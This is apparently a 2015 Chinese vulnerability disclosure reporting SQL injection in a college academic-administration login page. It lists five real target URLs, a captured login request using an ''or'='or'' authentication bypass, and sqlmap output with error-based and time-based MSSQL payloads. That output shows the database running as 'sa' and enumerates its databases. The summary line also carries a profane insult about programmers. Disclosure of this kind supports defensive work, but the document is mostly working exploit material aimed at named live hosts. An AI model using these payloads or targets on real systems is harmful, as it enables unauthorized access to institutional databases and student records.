### 简要描述:
男:问世间情为何物,只...女:一个大嘴巴子打上去,啪!去你妈逼的程序员还想找女朋友,活该死在代码上.
### 详细说明:
应乌云要求,五个案例!
```
http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp
http://221.232.159.24/dhjw/jwxs/login.asp
http://jiaowu.hustwenhua.net/jwxs/login.asp
http://xscx.cmcedu.cn/jwxs/login.asp
http://jwxt.hycgy.com:5000/jwxs/login.asp
```
登录的时候抓包
[<img src="https://images.seebug.org/upload/201503/23134131b0f9417332aaf2facd5751138e58292a.png" alt="QQ截图20150323134521.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/23134131b0f9417332aaf2facd5751138e58292a.png)
[<img src="https://images.seebug.org/upload/201503/231341522349117bd2b5164406c21be381e89242.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/231341522349117bd2b5164406c21be381e89242.png)
```
POST /dhjw/jwxs/login.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://221.232.159.24/dhjw/jwxs/login.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.232.159.24
Content-Length: 108
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME
datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
```
[<img src="https://images.seebug.org/upload/201503/23134257049f1fe51cb24b085eb4a35f8897616e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/23134257049f1fe51cb24b085eb4a35f8897616e.png)
[<img src="https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)
```
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: Account
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVER
T(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WH
EN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) C
HAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELEC
T COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS s
ys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Passwor
d=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
---
[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:47:47] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] Y
[13:47:49] [INFO] retrieved: sa
current user: 'sa'
[13:47:49] [INFO] fetching current database
[13:47:49] [INFO] retrieved: dhjw
current database: 'dhjw'
[13:47:49] [INFO] fetching database names
[13:47:49] [WARNING] reflective value(s) found and filtering out
[13:47:49] [WARNING] the SQL query provided does not return any output
[13:47:49] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:47:49] [INFO] fetching number of databases
[13:47:49] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[13:47:51] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[13:47:52] [ERROR] unable to retrieve the number of databases
[13:47:52] [INFO] retrieved: dhjw
[13:47:52] [INFO] retrieved: master
[13:47:52] [INFO] retrieved: tempdb
[13:47:53] [INFO] retrieved: model
[13:47:53] [INFO] retrieved: msdb
[13:47:53] [INFO] retrieved: ReportServer
[13:47:53] [INFO] retrieved: ReportServerTempDB
[13:47:53] [INFO] retrieved: dhjw
[13:47:54] [INFO] retrieved:
available databases [7]:
[*] dhjw
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[13:47:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\221.232.159.24'
[*] shutting down at 13:47:54
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)
暂无评论